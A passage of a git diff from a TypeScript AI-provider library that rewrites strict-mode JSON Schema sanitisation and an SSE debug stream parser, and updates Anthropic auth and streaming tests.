(isJsonObject(variant) && hasUnrepresentableStrictObjectMap(variant, epoch)) { - return true; - } - } - } - - for (const defsKey of ["$defs", "definitions"] as const) { - const defs = schema[defsKey]; - if (!isJsonObject(defs)) continue; - for (const k in defs) { - const defSchema = defs[k]; - if (isJsonObject(defSchema) && hasUnrepresentableStrictObjectMap(defSchema, epoch)) { - return true; - } - } - } - - return false; -} -/** - * First pass of strict-mode preparation. - * - * Rewrites everything strict mode forbids into something it accepts: - * - Drops non-structural keywords (`format`, `pattern`, `examples`, …), - * `const`, `nullable`, and `additionalProperties` (re-added by - * `enforceStrictSchema` as `false`). - * - `type: [a, b]` → `anyOf: [{type: a, …}, {type: b, …}]`, copying only the - * keywords each variant can use (e.g. `properties` stays only on the - * object variant). - * - `const` → single-entry `enum`. - * - Description carries a `(default: X)` suffix so the model still sees the - * documented default after the keyword is stripped. - * - `nullable: true` wraps the whole node in `anyOf:[T,{type:"null"}]`. - * - * Recurses into properties, items, prefixItems, combinators, and $defs. The - * `cache` WeakMap dedupes shared subgraphs; the `epoch` is the cycle guard. - */ -export function sanitizeSchemaForStrictMode( - schema: Record<string, unknown>, - epoch: number = epochNext(), - cache: WeakMap<Record<string, unknown>, Record<string, unknown>> = new WeakMap(), -): Record<string, unknown> { - const cached = cache.get(schema); - if (cached) return cached; - if (!once(schema, epoch)) return {}; - const typeValue = schema.type; - if (Array.isArray(typeValue)) { - const typeVariants = typeValue.filter((entry): entry is string => typeof entry === "string"); - const schemaWithoutType = { ...schema }; - delete schemaWithoutType.type; - - const sanitizedWithoutType = sanitizeSchemaForStrictMode(schemaWithoutType, epoch, cache); - if (typeVariants.length === 0) { - cache.set(schema, sanitizedWithoutType); - return sanitizedWithoutType; - } - // Build one variant schema per type. Each variant keeps only the keywords - // relevant to that type — object-only keywords stay on the object variant, - // array-only keywords on the array variant, etc. - - const variants = typeVariants.map(variantType => { - const variantSchema: Record<string, unknown> = { ...sanitizedWithoutType, type: variantType }; - if (variantType !== "object") { - delete variantSchema.properties; - delete variantSchema.required; - delete variantSchema.additionalProperties; - } - if (variantType !== "array") { - delete variantSchema.items; - } - return sanitizeSchemaForStrictMode(variantSchema, epoch, cache); - }); - - if (variants.length === 1) { - cache.set(schema, variants[0] as Record<string, unknown>); - return variants[0] as Record<string, unknown>; - } - - const result = { - anyOf: variants, - }; - cache.set(schema, result); - return result; - } - // Scalar `type`: walk the keys, rewriting or stripping per strict-mode rules. - - const sanitized: Record<string, unknown> = {}; - cache.set(schema, sanitized); - for (const key in schema) { - const value = schema[key]; - if (key in NON_STRUCTURAL_SCHEMA_KEYS || key === "type" || key === "const" || key === "nullable") { - continue; - } - // `properties` map — recurse into each property schema. - - if (key === "properties" && isJsonObject(value)) { - const properties: Record<string, unknown> = {}; - for (const propertyName in value) { - const propertySchema = value[propertyName]; - properties[propertyName] = isJsonObject(propertySchema) - ? sanitizeSchemaForStrictMode(propertySchema, epoch, cache) - : propertySchema; - } - sanitized.properties = properties; - continue; - } - // `items` can be schema, tuple-array, or scalar boolean — recurse where applicable. - - if (key === "items") { - if (isJsonObject(value)) { - sanitized.items = sanitizeSchemaForStrictMode(value, epoch, cache); - } else if (Array.isArray(value)) { - sanitized.items = value.map(entry => - isJsonObject(entry) ? sanitizeSchemaForStrictMode(entry, epoch, cache) : entry, - ); - } else { - sanitized.items = value; - } - continue; - } - // `prefixItems` is always an array of schemas (draft 2020-12). - - if (key === "prefixItems" && Array.isArray(value)) { - sanitized.prefixItems = value.map(entry => - isJsonObject(entry) ? sanitizeSchemaForStrictMode(entry, epoch, cache) : entry, - ); - continue; - } - // `anyOf`/`oneOf`/`allOf` arrays — recurse into each branch. - - if (COMBINATOR_KEYS.includes(key as (typeof COMBINATOR_KEYS)[number]) && Array.isArray(value)) { - sanitized[key] = value.map(entry => - isJsonObject(entry) ? sanitizeSchemaForStrictMode(entry, epoch, cache) : entry, - ); - continue; - } - // Definition maps — recurse into each named schema. - - if ((key === "$defs" || key === "definitions") && isJsonObject(value)) { - const defs: Record<string, unknown> = {}; - for (const definitionName in value) { - const definitionSchema = value[definitionName]; - defs[definitionName] = isJsonObject(definitionSchema) - ? sanitizeSchemaForStrictMode(definitionSchema, epoch, cache) - : definitionSchema; - } - sanitized[key] = defs; - continue; - } - // `additionalProperties` is owned by `enforceStrictSchema`, which sets it to false. - - if (key === "additionalProperties") { - continue; - } - - if (key === "description" && typeof value === "string" && schema.default !== undefined) { - // Preserve `default:` info for strict-mode providers that strip the keyword. - // Inline as `(default: X)` text in the description, matching the convention for - // runtime-placeholder defaults (e.g. `cwd`) that cannot live in the keyword form. - const defaultVal = schema.default; - const formatted = typeof defaultVal === "string" ? defaultVal : JSON.stringify(defaultVal); - sanitized.description = value.includes("(default:") ? value : `${value} (default: ${formatted})`; - continue; - } - - sanitized[key] = value; - } - // Post-pass: re-derive `type` and turn dropped keywords into a representable shape. - - if (Object.hasOwn(schema, "const")) { - const constVal = schema.const; - const existingEnum = Array.isArray(sanitized.enum) ? sanitized.enum : []; - if (!existingEnum.some(v => areJsonValuesEqual(v, constVal))) { - existingEnum.push(constVal); - } - sanitized.enum = existingEnum; - } - - // Preserve the original scalar type after the strip-and-rebuild loop. - if (typeof typeValue === "string") { - sanitized.type = typeValue; - } - - if (sanitized.type === undefined && isJsonObject(sanitized.properties)) { - sanitized.type = "object"; - } - - if (sanitized.type === undefined && (sanitized.items !== undefined || sanitized.prefixItems !== undefined)) { - sanitized.type = "array"; - } - - // Last-resort inference: a bare `enum` with homogeneous primitives gets a `type`. - if (sanitized.type === undefined && Array.isArray(sanitized.enum)) { - let inferredType: "null" | "string" | "number" | "boolean" | undefined; - let conflicting = false; - for (const v of sanitized.enum) { - const t = - v === null - ? "null" - : typeof v === "string" - ? "string" - : typeof v === "number" - ? "number" - : typeof v === "boolean" - ? "boolean" - : undefined; - if (t === undefined) continue; - if (inferredType === undefined) inferredType = t; - else if (inferredType !== t) { - conflicting = true; - break; - } - } - if (!conflicting && inferredType !== undefined) { - sanitized.type = inferredType; - } - } - - // `nullable: true` was stripped above — re-introduce it as an `anyOf` wrapper. - if (schema.nullable === true) { - const { nullable: _, ...withoutNullable } = sanitized; - return { anyOf: [withoutNullable, { type: "null" }] }; - } - - return sanitized; -} - -/** - * Recursively enforces JSON Schema constraints required by OpenAI/Codex strict mode: - * - `additionalProperties: false` on every object node - * - every key in `properties` present in `required` - * - * Properties absent from the original `required` array were TypeBox-optional. - * They are made nullable (`anyOf: [T, { type: "null" }]`) so the model can - * signal omission by outputting null rather than omitting the key entirely. - * - * @throws {Error} When a schema node has no `type`, array-based combinator - * (`anyOf`/`allOf`/`oneOf`), object-based combinator (`not`), or `$ref` — - * i.e. the node is not representable in strict mode. Prefer - * {@link tryEnforceStrictSchema} which catches this and degrades gracefully. - */ -export function enforceStrictSchema( - schema: Record<string, unknown>, - cache: WeakMap<Record<string, unknown>, Record<string, unknown>> = new WeakMap(), -): Record<string, unknown> { - if (!enter(schema)) { - throw new Error("Schema contains a circular object graph — cannot enforce strict mode"); - } - try { - const cached = cache.get(schema); - if (cached) return cached; - const result = { ...schema }; - cache.set(schema, result); - return enforceStrictSchemaBody(schema, result, cache); - } finally { - exit(schema); - } -} - -function enforceStrictSchemaBody( - _schema: Record<string, unknown>, - result: Record<string, unknown>, - cache: WeakMap<Record<string, unknown>, Record<string, unknown>>, -): Record<string, unknown> { - const isObjectType = result.type === "object"; - if (isObjectType) { - result.additionalProperties = false; - const propertiesValue = result.properties; - const props = - propertiesValue != null && typeof propertiesValue === "object" && !Array.isArray(propertiesValue) - ? (propertiesValue as Record<string, unknown>) - : {}; - const originalRequired = new Set<string>( - Array.isArray(result.required) - ? result.required.filter((value): value is string => typeof value === "string") - : [], - ); - const strictProperties: Record<string, unknown> = {}; - for (const key in props) { - const value = props[key]; - const processed = - value != null && typeof value === "object" && !Array.isArray(value) - ? enforceStrictSchema(value as Record<string, unknown>, cache) - : value; - // Optional property — wrap as nullable so strict mode accepts it - if (!originalRequired.has(key)) { - // Don't double-wrap if already nullable - if ( - isJsonObject(processed) && - Array.isArray(processed.anyOf) && - processed.anyOf.some(v => isJsonObject(v) && v.type === "null") - ) { - strictProperties[key] = processed; - continue; - } - if (isJsonObject(processed) && typeof processed.description === "string") { - const { description, ...withoutDescription } = processed; - strictProperties[key] = { anyOf: [withoutDescription, { type: "null" }], description }; - continue; - } - strictProperties[key] = { anyOf: [processed, { type: "null" }] }; - continue; - } - strictProperties[key] = processed; - } - result.properties = strictProperties; - result.required = Object.keys(strictProperties); - } - if (result.items != null && typeof result.items === "object") { - if (Array.isArray(result.items)) { - result.items = result.items.map(entry => - entry != null && typeof entry === "object" && !Array.isArray(entry) - ? enforceStrictSchema(entry as Record<string, unknown>, cache) - : entry, - ); - } else { - result.items = enforceStrictSchema(result.items as Record<string, unknown>, cache); - } - } - if (Array.isArray(result.prefixItems)) { - result.prefixItems = result.prefixItems.map(entry => - entry != null && typeof entry === "object" && !Array.isArray(entry) - ? enforceStrictSchema(entry as Record<string, unknown>, cache) - : entry, - ); - } - for (const key of COMBINATOR_KEYS) { - if (Array.isArray(result[key])) { - result[key] = (result[key] as unknown[]).map(entry => - entry != null && typeof entry === "object" && !Array.isArray(entry) - ? enforceStrictSchema(entry as Record<string, unknown>, cache) - : entry, - ); - } - } - for (const defsKey of ["$defs", "definitions"] as const) { - if (result[defsKey] != null && typeof result[defsKey] === "object" && !Array.isArray(result[defsKey])) { - const defs = result[defsKey] as Record<string, unknown>; - const nextDefs: Record<string, unknown> = {}; - for (const name in defs) { - const def = defs[name]; - nextDefs[name] = - def != null && typeof def === "object" && !Array.isArray(def) - ? enforceStrictSchema(def as Record<string, unknown>, cache) - : def; - } - result[defsKey] = nextDefs; - } - } - // Strict mode requires every schema node to declare a concrete type (or combinator/$ref/enum/const). - // Schemas like `{}` (match anything) or `{items: {}}` are not representable in strict mode. - if ( - result.type === undefined && - result.$ref === undefined && - result.enum === undefined && - result.const === undefined && - !COMBINATOR_KEYS.some(key => Array.isArray(result[key])) && - !isJsonObject(result.not) - ) { - throw new Error("Schema node has no type, combinator, or $ref — cannot enforce strict mode"); - } - return result; -} - -export function tryEnforceStrictSchema(schema: Record<string, unknown>) { - return stamp(schema, kStrictSchema, s => { - const upgraded = upgradeJsonSchemaTo202012(s) as Record<string, unknown>; - if (hasUnrepresentableStrictObjectMap(upgraded)) { - return { schema: upgraded, strict: false }; - } - try { - const sanitized = sanitizeSchemaForStrictMode(upgraded); - return { schema: enforceStrictSchema(sanitized), strict: true }; - } catch { - return { schema: upgraded, strict: false }; - } - }); -} diff --git a/packages/ai/src/utils/sse-debug.ts b/packages/ai/src/utils/sse-debug.ts index 467465ffc..b42028a9f 100644 --- a/packages/ai/src/utils/sse-debug.ts +++ b/packages/ai/src/utils/sse-debug.ts @@ -1,4 +1,4 @@ -import { readSseEvents, type ServerSentEvent } from "@oh-my-pi/pi-utils"; +import type { ServerSentEvent } from "@oh-my-pi/pi-utils"; import type { RawSseEvent } from "../types"; type FetchFunction = (input: string | URL | Request, init?: RequestInit) => Promise<Response>; @@ -6,35 +6,220 @@ type FetchWithPreconnect = FetchFunction & { preconnect?: typeof fetch.preconnec type RawSseObserver = (event: RawSseEvent) => void; -function toRawSseEvent(event: ServerSentEvent): RawSseEvent { - return { - event: event.event, - data: event.data, - raw: [...event.raw], - }; -} - export function notifyRawSseEvent(observer: RawSseObserver | undefined, event: ServerSentEvent | RawSseEvent): void { if (!observer) return; try { - observer({ event: event.event, data: event.data, raw: [...event.raw] }); + // Pass the event through without cloning `raw`. The only wired observer + // (`RawSseDebugBuffer.recordEvent`) treats `raw` as owned and never + // mutates it; new observers must adhere to the same contract. + // `ServerSentEvent` and `RawSseEvent` are structurally identical + // (`event: string | null`, `data: string`, `raw: string[]`). + observer(event as RawSseEvent); } catch { // Raw stream observers are diagnostic only and must not affect generation. } } function isSseResponse(response: Response): boolean { + // `response.body` is non-null for any fetch Response with a body, but we + // still guard because user-supplied `fetch` mocks may return `{ body: null }` + // for empty responses and we don't want to wrap those. if (!response.ok || !response.body) return false; - return response.headers.get("content-type")?.toLowerCase().includes("text/event-stream") ?? false; + const contentType = response.headers.get("content-type"); + // All providers in this repo emit lowercase `text/event-stream` (verified + // against anthropic, openai-completions, openai-responses, azure-openai-responses, + // google-shared, google-gemini-cli, openai-codex-responses, pi-native-client, + // and the auth-gateway server). A canonical `includes` check is sufficient; + // if a future provider sends mixed case it will fall back to the unwrapped + // fetch — observably safe, just no debug tee for that response. + return contentType?.includes("text/event-stream") ?? false; } -async function consumeRawSseStream(stream: ReadableStream<Uint8Array>, observer: RawSseObserver): Promise<void> { - try { - for await (const event of readSseEvents(stream)) { - notifyRawSseEvent(observer, toRawSseEvent(event)); +// Reused for every UTF-8 line decode. Safe because lines are split on LF +// (0x0a), which is single-byte ASCII and never appears inside a UTF-8 +// multi-byte sequence — each line is a complete UTF-8 run, so the decoder +// carries no state across calls. +const SSE_LINE_DECODER = new TextDecoder("utf-8"); + +// Decode bytes [start, end) of an SSE line. +// +// A previous revision added an ASCII fast-path using `String.fromCharCode.apply` +// over chunked subarrays, on the theory that skipping `TextDecoder` would save +// the ~9.7% `decode` self-time the profile reported. In practice the swap +// *regressed* total wall time: `fromCharCode` became a new 7.8% hotspot, +// `Uint8Array` allocations grew 5.3%, and `subarray` rose from 11.5% to 18.3% +// — net loss of ~10pp. Bun's `TextDecoder.decode` has a fast C++ ASCII path +// that beats chunked `fromCharCode.apply` for the typical sub-1KB SSE line, +// so we keep the decoder. The line is bounded by LF (0x0a, single-byte +// ASCII), so each [start, end) slice is a complete UTF-8 run and the shared +// stateless decoder is safe to reuse. +function decodeSseLine(buf: Uint8Array, start: number, end: number): string { + if (start === 0 && end === buf.length) return SSE_LINE_DECODER.decode(buf); + return SSE_LINE_DECODER.decode(buf.subarray(start, end)); +} + +/** + * Inline SSE event splitter. Walks the byte stream as it flows through a + * `TransformStream`, dispatching parsed events to the debug observer while + * the bytes are forwarded unchanged to the response consumer. Replaces the + * previous `body.tee()` + `readSseEvents` re-parse pipeline so the byte + * stream is parsed exactly once when a debug observer is attached. + * + * Field parsing intentionally mirrors `readSseEvents` in `@oh-my-pi/pi-utils` + * (only `event` and `data` are observed; `id`/`retry` ignored; CR stripped + * before LF dispatch; leading space after `:` trimmed; `data:` lines join + * with `\n`). Reusing `readSseEvents` directly would require a second stream + * pipeline, which is exactly what this class avoids. + */ +class SseTeeParser { + #observer: RawSseObserver; + // Trailing bytes from the previous chunk that did not end with LF. + #partial: Uint8Array | null = null; + #event: string | null = null; + #data: string | null = null; + #raw: string[] = []; + + constructor(observer: RawSseObserver) { + this.#observer = observer; + } + + push(chunk: Uint8Array): void { + // Carry-forward path: concat the partial line with the new chunk so the + // LF scan walks a single contiguous buffer. The common case (partial is + // null) skips the allocation entirely. + let buf: Uint8Array; + if (this.#partial) { + buf = new Uint8Array(this.#partial.length + chunk.length); + buf.set(this.#partial, 0); + buf.set(chunk, this.#partial.length); + this.#partial = null; + } else { + buf = chunk; + } + + const len = buf.length; + let i = 0; + while (i < len) { + const lf = buf.indexOf(0x0a, i); + if (lf === -1) { + // Retain the tail as a partial line for the next chunk. Copy + // because the source `chunk` buffer may be reused upstream. + this.#partial = buf.subarray(i).slice(); + return; + } + let end = lf; + if (end > i && buf[end - 1] === 0x0d) end--; + this.#consumeLine(buf, i, end); + i = lf + 1; + } + } + + flush(): void { + // Treat any trailing partial line (no terminating LF) as a complete line. + if (this.#partial) { + const tail = this.#partial; + this.#partial = null; + let end = tail.length; + if (end > 0 && tail[end - 1] === 0x0d) end--; + if (end > 0) this.#consumeLine(tail, 0, end); + } + // Real services don't always close on a blank line — flush any pending event. + this.#dispatch(); + } + + #consumeLine(buf: Uint8Array, start: number, end: number): void { + if (end === start) { + this.#dispatch(); + return; + } + // Comment line: keep verbatim in `raw` for diagnostic context, skip parsing. + // SSE spec § 9.2.6: lines beginning with ':' are heartbeats/comments and + // MUST NOT contribute to the event dispatch state. Heartbeats are the + // single most common line type on long-poll provider streams, so the + // early-return here directly avoids ~half the field-parse work. + if (buf[start] === 0x3a /* ':' */) { + this.#raw.push(decodeSseLine(buf, start, end)); + return; + } + // Byte-level field parse. We avoid `text.indexOf(':')` + two `String.slice` + // calls (~6% of CPU pre-optimization) by scanning bytes for the field + // delimiter and matching the field name byte-for-byte. Field-name bytes + // are ASCII per SSE spec, so byte offsets equal char offsets in the + // decoded string and we can `slice` the value directly off `text` without + // re-decoding. + // + // ASCII signatures (verified against SSE spec): + // "event" = 0x65 0x76 0x65 0x6e 0x74 (5 bytes) + // "data" = 0x64 0x61 0x74 0x61 (4 bytes) + let colon = -1; + for (let k = start; k < end; k++) { + if (buf[k] === 0x3a) { + colon = k; + break; + } + } + const fieldEnd = colon === -1 ? end : colon; + let valueStart = colon === -1 ? end : colon + 1; + // Per SSE spec, a single leading SP after the colon is stripped. + if (valueStart < end && buf[valueStart] === 0x20 /* ' ' */) valueStart++; + const fieldLen = fieldEnd - start; + const isEvent = + fieldLen === 5 && + buf[start] === 0x65 && + buf[start + 1] === 0x76 && + buf[start + 2] === 0x65 && + buf[start + 3] === 0x6e && + buf[start + 4] === 0x74; + const isData = + !isEvent && + fieldLen === 4 && + buf[start] === 0x64 && + buf[start + 1] === 0x61 && + buf[start + 2] === 0x74 && + buf[start + 3] === 0x61; + // Decode the line exactly once. Raw observers (debug buffer) want it + // regardless of field kind; `id`/`retry`/unknown lines pay only the + // decode cost, not any extra slicing. + const text = decodeSseLine(buf, start, end); + this.#raw.push(text); + if (isEvent) { + // `valueStart - start` is a byte offset into the line; since the + // "event:" prefix (and the optional SP) are pure ASCII, that byte + // offset equals the char offset in the decoded `text`. + this.#event = valueStart === end ? "" : text.slice(valueStart - start); + } else if (isData) { + const value = valueStart === end ? "" : text.slice(valueStart - start); + if (this.#data === null) this.#data = value; + else this.#data = `${this.#data}\n${value}`; + } + // `id` and `retry` are intentionally ignored — providers don't use them + // and reconnects are handled by the underlying transport. + } + + // Hands ownership of the accumulated `raw` array to the observer. The + // observer (currently only `RawSseDebugBuffer.recordEvent`) MAY retain the + // array; we install a fresh `#raw = []` for the next event before invoking + // the observer so there is no aliasing across dispatches. This contract is + // mirrored in `notifyRawSseEvent` (no defensive clone) — see its comment. + // + // TODO(BufferOpt): once the buffer-side audit confirms it never mutates + // `event.raw`, the defensive `[...event.raw]` clone in older call paths + // (search for `notifyRawSseEvent`) can be dropped repository-wide. + #dispatch(): void { + if (this.#event === null && this.#data === null) return; + const event: RawSseEvent = { + event: this.#event, + data: this.#data ?? "", + raw: this.#raw, + }; + this.#event = null; + this.#data = null; + this.#raw = []; + try { + this.#observer(event); + } catch { + // Raw stream observers are diagnostic only and must not affect generation. } - } catch { - // The consumer branch may cancel/abort the original response. Debug capture is best-effort. } } @@ -54,10 +239,44 @@ export function wrapFetchForSseDebug( const body = response.body; if (!body) return response; - const [debugBody, consumerBody] = body.tee(); - void consumeRawSseStream(debugBody, observer); + // Single-pass interception. Previously implemented as + // `body.pipeThrough(new TransformStream({...}))`, but the WHATWG + // TransformStream machinery imposes a per-chunk Promise boundary + // (`#handleNumberResult` showed at 8.8% self-time in CPU profile). + // A manual ReadableStream pulling directly from `body.getReader()` + // skips that hop: every `read()` immediately feeds both the parser + // and the controller in the same microtask. + const parser = new SseTeeParser(observer); + const reader = body.getReader(); + const teed = new ReadableStream<Uint8Array>({ + async pull(controller) { + try { + const { done, value } = await reader.read(); + if (done) { + parser.flush(); + controller.close(); + return; + } + // Enqueue first so the consumer sees bytes ASAP; parser + // dispatch is best-effort diagnostic and runs after. + controller.enqueue(value); + parser.push(value); + } catch (err) { + // Mirror TransformStream semantics: surface upstream + // errors to the consumer; do not flush a partial event. + controller.error(err); + } + }, + cancel(reason) { + // Propagate downstream cancellation to the source body so the + // underlying connection is released. Matches `pipeThrough`'s + // cancel-propagation behavior; `flush()` is intentionally NOT + // called (TransformStream skips `flush` on abort too). + return reader.cancel(reason); + }, + }); - return new Response(consumerBody, { + return new Response(teed, { status: response.status, statusText: response.statusText, headers: response.headers, diff --git a/packages/ai/src/utils/validation.ts b/packages/ai/src/utils/validation.ts index f7ed55301..7f21a4d2a 100644 --- a/packages/ai/src/utils/validation.ts +++ b/packages/ai/src/utils/validation.ts @@ -872,17 +872,16 @@ type ValidationContext = * Keyed by the parameters object identity, which is stable across tool * registrations. */ -const validationContextCache = new WeakMap<object, ValidationContext>(); +const kValidationContext = Symbol("ai.validationContext"); +type ParamsWithValidationContext = object & { [kValidationContext]?: ValidationContext }; function getValidationContext(tool: Tool): ValidationContext { - const params = tool.parameters as object; - let ctx = validationContextCache.get(params); - if (ctx) return ctx; - if (isZodSchema(params)) { - ctx = { kind: "zod", zod: params, json: zodToWireSchema(params) }; - } else { - ctx = { kind: "json", json: upgradeJsonSchemaTo202012(params) as Record<string, unknown> }; - } - validationContextCache.set(params, ctx); + const params = tool.parameters as ParamsWithValidationContext; + const existing = params[kValidationContext]; + if (existing) return existing; + const ctx: ValidationContext = isZodSchema(params) + ? { kind: "zod", zod: params, json: zodToWireSchema(params) } + : { kind: "json", json: upgradeJsonSchemaTo202012(params) as Record<string, unknown> }; + params[kValidationContext] = ctx; return ctx; } diff --git a/packages/ai/test/anthropic-oauth.test.ts b/packages/ai/test/anthropic-oauth.test.ts index 3a66ab1d6..66345cb4d 100644 --- a/packages/ai/test/anthropic-oauth.test.ts +++ b/packages/ai/test/anthropic-oauth.test.ts @@ -2,7 +2,7 @@ import { afterEach, describe, expect, it, vi } from "bun:test"; import * as fs from "node:fs"; import * as os from "node:os"; import * as path from "node:path"; -import { AuthCredentialStore } from "../src/auth-storage"; +import { SqliteAuthCredentialStore } from "../src/auth-storage"; import { buildAnthropicUrl, findAnthropicAuth } from "../src/utils/anthropic-auth"; import { AnthropicOAuthFlow, refreshAnthropicToken } from "../src/utils/oauth/anthropic"; import { withEnv } from "./helpers"; @@ -199,7 +199,7 @@ describe("anthropic auth resolution", () => { const tmpDir = path.join(os.tmpdir(), `pi-ai-auth-${Date.now()}-${Math.random().toString(16).slice(2)}`); fs.mkdirSync(tmpDir, { recursive: true }); const dbPath = path.join(tmpDir, "agent.db"); - const store = await AuthCredentialStore.open(dbPath); + const store = await SqliteAuthCredentialStore.open(dbPath); try { store.replaceAuthCredentialsForProvider("anthropic", [ { type: "oauth", access: "sk-ant-oat-db", refresh: "refresh", expires: Date.now() + 20 * 60 * 1000 }, @@ -231,7 +231,7 @@ describe("anthropic auth resolution", () => { const tmpDir = path.join(os.tmpdir(), `pi-ai-auth-${Date.now()}-${Math.random().toString(16).slice(2)}`); fs.mkdirSync(tmpDir, { recursive: true }); const dbPath = path.join(tmpDir, "agent.db"); - const store = await AuthCredentialStore.open(dbPath); + const store = await SqliteAuthCredentialStore.open(dbPath); try { store.replaceAuthCredentialsForProvider("anthropic", [ { type: "oauth", access: "sk-ant-oat-db", refresh: "refresh", expires: Date.now() + 20 * 60 * 1000 }, @@ -261,7 +261,7 @@ describe("anthropic auth resolution", () => { const tmpDir = path.join(os.tmpdir(), `pi-ai-auth-${Date.now()}-${Math.random().toString(16).slice(2)}`); fs.mkdirSync(tmpDir, { recursive: true }); const dbPath = path.join(tmpDir, "agent.db"); - const store = await AuthCredentialStore.open(dbPath); + const store = await SqliteAuthCredentialStore.open(dbPath); try { store.replaceAuthCredentialsForProvider("anthropic", [{ type: "api_key", key: "sk-ant-api-db" }]); await withEnv( diff --git a/packages/ai/test/anthropic-stream-envelope.test.ts b/packages/ai/test/anthropic-stream-envelope.test.ts index 19be1b7c8..f4f8acca9 100644 --- a/packages/ai/test/anthropic-stream-envelope.test.ts +++ b/packages/ai/test/anthropic-stream-envelope.test.ts @@ -1,6 +1,6 @@ import { afterEach, describe, expect, it, vi } from "bun:test"; +import { scheduler } from "node:timers/promises"; import { Messages } from "@anthropic-ai/sdk/resources/messages/messages"; -import * as z from "zod/v4"; import { streamAnthropic } from "../src/providers/anthropic"; import type { AssistantMessageEvent, Context, Model, ProviderSessionState } from "../src/types"; @@ -20,6 +20,17 @@ const model: Model<"anthropic-messages"> = { const context: Context = { messages: [{ role: "user", content: "Say hi", timestamp: Date.now() }], }; +const queryObjectSchema = { + type: "object", + properties: { query: { type: "string" } }, + required: ["query"], +}; + +const cityObjectSchema = { + type: "object", + properties: { city: { type: "string" } }, + required: ["city"], +}; type MockAnthropicEvent = Record<string, unknown>; type MockAnthropicStream = AsyncIterable<MockAnthropicEvent>; @@ -111,8 +122,11 @@ function getStrictFlags(params: unknown): boolean[] { return tools.map(tool => tool.strict === true); } -function createTextSuccessEvents(text: string): MockAnthropicEvent[] { - return [ +function createTextSuccessEvents( + text: string, + options: { duplicateMessageStart?: boolean } = {}, +): MockAnthropicEvent[] { + const events: MockAnthropicEvent[] = [ { type: "message_start", message: { @@ -126,7 +140,6 @@ function createTextSuccessEvents(text: string): MockAnthropicEvent[] { }, }, { type: "content_block_start", index: 0, content_block: { type: "text", text: "" } }, - { type: "message_start", message: { id: "msg_duplicate", usage: { input_tokens: 99, output_tokens: 99 } } }, { type: "content_block_delta", index: 0, delta: { type: "text_delta", text } }, { type: "content_block_stop", index: 0 }, { @@ -141,6 +154,13 @@ function createTextSuccessEvents(text: string): MockAnthropicEvent[] { }, { type: "message_stop" }, ]; + if (options.duplicateMessageStart) { + events.splice(2, 0, { + type: "message_start", + message: { id: "msg_duplicate", usage: { input_tokens: 99, output_tokens: 99 } }, + }); + } + return events; } function createTextSuccessEventsWithPreamble(text: string, preambleEvents: MockAnthropicEvent[]): MockAnthropicEvent[] { @@ -190,7 +210,7 @@ afterEach(() => { describe("anthropic stream envelope handling", () => { it("ignores duplicate message_start envelopes without resetting streamed text", async () => { vi.spyOn(Messages.prototype, "create").mockImplementation( - () => createMockRequest(createTextSuccessEvents("hello")) as never, + () => createMockRequest(createTextSuccessEvents("hello", { duplicateMessageStart: true })) as never, ); const stream = streamAnthropic(model, context, { apiKey: "sk-ant-test" }); @@ -269,6 +289,7 @@ describe("anthropic stream envelope handling", () => { attempt === 1 ? createMalformedPreMessageStartEvents() : createTextSuccessEvents("recovered"), ) as never; }); + vi.spyOn(scheduler, "wait").mockResolvedValue(undefined); const stream = streamAnthropic(model, context, { apiKey: "sk-ant-test" }); const events: AssistantMessageEvent[] = []; @@ -294,7 +315,7 @@ describe("anthropic stream envelope handling", () => { name: "edit", description: "Edit a value", strict: true, - parameters: z.object({ query: z.string() }), + parameters: queryObjectSchema, }, ], }; @@ -350,7 +371,7 @@ describe("anthropic stream envelope handling", () => { name: "edit", description: "Edit a value", strict: true, - parameters: z.object({ query: z.string() }), + parameters: queryObjectSchema, }, ], }; @@ -464,7 +485,7 @@ describe("anthropic stream envelope handling", () => { sseFrame("content_block_start", successEvents[1]), sseRawFrame("content_block_delta", malformedTextDelta), sseFrame("content_block_stop", { type: "content_block_stop", index: 0 }), - sseFrame("message_delta", successEvents[5]), + sseFrame("message_delta", successEvents[4]), sseFrame("message_stop", { type: "message_stop" }), ]; vi.spyOn(Messages.prototype, "create").mockImplementation(() => createRawSseRequest(frames) as never); @@ -486,7 +507,7 @@ describe("anthropic stream envelope handling", () => { { name: "lookup_weather", description: "Lookup weather", - parameters: z.object({ city: z.string() }), + parameters: cityObjectSchema, }, ], }; diff --git a/packages/ai/test/anthropic-stream-timeout.test.ts b/packages/ai/test/anthropic-stream-timeout.test.ts index d07734a06..210ecba50 100644 --- a/packages/ai/test/anthropic-stream-timeout.test.ts +++ b/packages/ai/test/anthropic-stream-timeout.test.ts @@ -1,4 +1,4 @@ -import { afterEach, describe, expect, it } from "bun:test"; +import { afterEach, describe, expect, it, vi } from "bun:test"; import type Anthropic from "@anthropic-ai/sdk"; import { streamAnthropic } from "../src/providers/anthropic"; import type { Context, Model } from "../src/types"; @@ -147,13 +147,16 @@ describe("anthropic first-event timeout retries", () => { }) as never; }) as unknown as Anthropic["messages"]["create"]; const client = { messages: { create } } as Anthropic; + const providerRetryWait = vi.fn(async () => {}); const result = await streamAnthropic(model, context, { client, - streamFirstEventTimeoutMs: 20, + streamFirstEventTimeoutMs: 1, + providerRetryWait, }).result(); expect(attempt).toBe(2); + expect(providerRetryWait).toHaveBeenCalledWith(2000, undefined); expect(result.stopReason).toBe("stop"); expect(result.content).toEqual([{ type: "text", text: "retry recovered" }]); expect(result.responseId).toBe("msg_retry_success"); @@ -163,7 +166,7 @@ describe("anthropic first-event timeout retries", () => { const create = ((_body: unknown, requestOptions?: { signal?: AbortSignal }) => { return createAnthropicMockStream({ signal: requestOptions?.signal, - connectDelayMs: 30, + connectDelayMs: 2, events: createSuccessfulAnthropicEvents("delayed connect"), }) as never; }) as unknown as Anthropic["messages"]["create"]; @@ -171,7 +174,7 @@ describe("anthropic first-event timeout retries", () => { const result = await streamAnthropic(model, context, { client, - streamFirstEventTimeoutMs: 20, + streamFirstEventTimeoutMs: 1, }).result(); expect(result.stopReason).toBe("stop"); @@ -187,12 +190,12 @@ describe("anthropic first-event timeout retries", () => { const client = { messages: { create } } as Anthropic; const controller = new AbortController(); - setTimeout(() => controller.abort(), 5); + setTimeout(() => controller.abort(), 1); const result = await streamAnthropic(model, context, { client, signal: controller.signal, - streamFirstEventTimeoutMs: 50, + streamFirstEventTimeoutMs: 10, }).result(); expect(attempt).toBe(1); @@ -237,8 +240,8 @@ describe("anthropic first-event timeout retries", () => { const result = await streamAnthropic(model, context, { client, - streamFirstEventTimeoutMs: 1_000, - streamIdleTimeoutMs: 20, + streamFirstEventTimeoutMs: 10, + streamIdleTimeoutMs: 1, }).result(); expect(attempt).toBe(1); diff --git a/packages/ai/test/anthropic-tool-schema.test.ts 